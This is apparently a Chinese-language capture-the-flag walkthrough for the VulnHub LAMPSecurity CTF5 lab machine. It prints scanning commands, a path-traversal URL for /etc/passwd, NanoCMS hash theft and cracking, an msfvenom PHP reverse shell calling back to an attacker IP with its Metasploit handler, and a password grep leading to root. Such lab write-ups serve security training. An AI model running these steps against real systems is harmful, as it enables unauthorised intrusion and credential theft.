vulnhub-LAMPSecurity:CTF 5

admin 2022年7月22日09:29:38评论151 views字数 1621阅读5分24秒阅读模式

本次使用靶机名为LAMPSECURITY: CTF4的ctf挑战。我们的目标是获取该靶机root shell

下载链接:https://www.vulnhub.com/entry/lampsecurity-ctf5,84/



网络扫描

老规矩 首先要获取目标IP进行确定

netdiscover -i eth0 -r 192.168.0.0/24


vulnhub-LAMPSecurity:CTF 5


该靶机IP地址-> 192.168.0.101

运行NMAP进行扫描


nmap -sV -sC -p- -oN /CTF/vulnhub/ctf5/nmap 192.168.0.101


vulnhub-LAMPSecurity:CTF 5


nmap扫描显示该靶机开放大量的端口。我们首先从80(http)开始

浏览URL http://192.168.0.1/


vulnhub-LAMPSecurity:CTF 5


看到该网站有很多选项可以进一步导航。


网络服务扫描

运行Nikto工具获取更多信息


nikto -h 192.168.0.101


vulnhub-LAMPSecurity:CTF 5


在回显中我们可以看到nikto给我们列举了很多该机器容易出现的漏洞

比如LRL/RFL漏洞 现在我们从这里入手


http://192.168.0.101/index.php?page=../../../../../../../../../etc/passwd%00


vulnhub-LAMPSecurity:CTF 5


接下来我们点击blog页面,他会将我们重定向到URL http://192.168.0.101/~andy/


vulnhub-LAMPSecurity:CTF 5


在这里我们注意到一个很关键的点,该网站是由nanoCMS提供支持,因此我们搜索了关于NanoCMS相关的漏洞


vulnhub-LAMPSecurity:CTF 5


NanoCMS是一个基于PHP的轻量级CMS,现已停产。在上图我们也可以看到它容易出现信息泄露漏洞,因为它无法验证对敏感文件的访问   “/data/pagesdat.txt”.

那么现在我们尝试在http://192.168.0.101/~andy/后添加 /data/pagesdata.txt  进行访问。


vulnhub-LAMPSecurity:CTF 5


在此文件中包含管理员的用户名和密码哈希值

接下来进行MD5解密

https://crackstation.net/


vulnhub-LAMPSecurity:CTF 5


那么现在我们获取到“shannon”为管理员“admin”用户的密码

现在点击导航页blog左下角的登录按钮,尝试登录


vulnhub-LAMPSecurity:CTF 5


登录到管理面板后可以看到很多功能按钮 注意到“New Page”在这里我们可以尝试添加新内容


vulnhub-LAMPSecurity:CTF 5


生成PHP后门

使用msfvenom命令生成一个反向PHP shell


msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 -f raw


vulnhub-LAMPSecurity:CTF 5


现在将以上代码进行复制 


vulnhub-LAMPSecurity:CTF 5


粘贴到Content位置。然后单机添加页面。


vulnhub-LAMPSecurity:CTF 5


在blog导航页我们可以看到php shell已经上传成功。


反向连接

现在我们打开metasploit控制台并执行以下操作


use exploit/multi/handlerset payload php/meterpreter/reverse_tcpset lhost 192.168.0.104set lport 4444run


vulnhub-LAMPSecurity:CTF 5


在运行后点击当问我们上传的shell。这样我们就会得到一个meterpreter控制台,

为了访问正确的TTY shell 我们在中终端运行以下操作


shellpython -c 'import pty; pty.spawn("/bin/bash")'


vulnhub-LAMPSecurity:CTF 5


因为/home/目录是可读的


Linux本地枚举

我们尝试搜索字符串 passowrd


grep -R -i password /home/*


vulnhub-LAMPSecurity:CTF 5


在这里我们找到我感兴趣的东西,存在root password

下面我们查看此文件


cat 481bca0d-7206-45dd-a459-a72ea1131329.note


vulnhub-LAMPSecurity:CTF 5


呕吼 真的是一个很大的惊喜。


获得root权限


su - #切换到root用户


vulnhub-LAMPSecurity:CTF 5


现在我们就得到了root访问权限。


在本机器中 存在多种方式可以获得root权限,大家可以尝试尝试哦。


点击下方公众号获取更多内容

原文始发于微信公众号(剑客江湖):vulnhub-LAMPSecurity:CTF 5

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月22日09:29:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub-LAMPSecurity:CTF 5http://cn-sec.com/archives/1190479.html

发表评论

匿名网友 填写信息